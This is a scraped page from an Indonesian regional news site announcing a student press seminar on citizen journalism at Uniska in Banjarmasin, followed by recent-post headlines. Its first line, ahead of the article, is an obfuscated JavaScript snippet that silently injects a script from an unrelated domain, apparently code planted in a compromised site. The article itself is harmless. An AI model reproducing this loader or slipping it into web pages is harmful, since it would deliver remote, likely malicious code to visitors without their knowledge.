(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
kampus

Pekan Jurnalistik VI LPM Lentera Uniska Bakal Hadirkan Dua Wartawan Senior, Kupas Jurnalisme Warga


KANALKALIMANTAN.COM, BANJARMASIN – Perkembangan teknologi yang pesat membuat penyebaran informasi menjadi sangat cepat.

Di era sekarang, masyarakat tidak hanya menjadi konsumen media, tapi juga bisa terlibat dalam proses pengelolaan informasi itu sendiri, biasa disebut jurnalisme warga.

Kondisi itu bisa sangat memudahkan seseorang untuk mendapatkan suatu isu atau peristiwa. Kehadiran jurnalisme warga juga mampu memperluas ruang-ruang berekspresi bagi publik.

Di satu sisi, kehadiran jurnalisme warga diragukan oleh beberapa orang, terutama mereka yang berprofesi sebagai jurnalis.

 

Baca juga  : SMPN 1 Astambul Juara Festival Rudat

Jurnalisme warga yang bersifat terbuka lantaran siapa saja dapat menyampaikan hal apapun, menjadi alasan utama.

Terlebih, produk informasi yang disampaikan melalui jurnalisme warga ini menjadi hal yang sulit untuk dipertanggungjawabkan, baik dari segi kebenaran berita maupun positif atau negatifnya muatan berita.

Hal tersebut menjadi sebuah tantangan bagaimana mejaga agar jurnalisme warga tetap berada dalam koridor etika jurnalistik yang berlaku.

Beranjak dari fenomena itu, Lembaga Pers Mahasiswa (LPM) Lentera Universitas Islam Kalimantan (Uniska) MAB menggelar seminar bertajuk Pekan Jurnalistik ke-VI, pada Sabtu (6/8/2022).

 

Baca juga  : FKMKB 2022-2024 Dilantik, Ini Pesan Bupati Saidi Mansyur

Kegiatan akan mengambil tempat di gedung Balai Teknologi Informasi dan Komunikasi Pendidikan (BTIKP) Provinsi Kalimantan Selatan, Jalan Perdagangan Komplek Bumi Indah Lestari 2, Kecamatan Banjarmasin Utara.

Dalam acara tersebut, LPM Lentera menghadirkan pembicara Andry Susanto, Eksekutif Produser MNCTV dan Toto Fachrudin, jurnalis senior di Kalsel.

Keduanya akan berbicara lebih jauh terkait etika dan tata cara melakukan praktik jurnalisme warga. Termasuk, dampaknya terhadap pekerja media.

“Pendaftaran masih dibuka hingga hari H acara,” kata Ketua Pelaksana Pekan Jurnalistik VI, Aji Prayogo.

Terkait informasi pendaftaran serta tiket seminar, bisa selengkapnya dicek di akun instagram @lpmlentera_uniska. (Kanalkalimantan.com/rls)

Reporter : rls
Editor : kk


Desy Arfianty

Recent Posts

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

11 menit ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

32 menit ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

52 menit ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

2 jam ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

4 jam ago

Pipa Bocor, Suplai Air Bersih di Banjarmasin Barat dan Tengah Terhenti

KANALKALIMANTAN.COM, BANJARMASIN - Pipa distribusi air bersih milik Perusahaan Air Minum (PAM) Bandarmasih di wilayah… Read More

5 jam ago

This website uses cookies.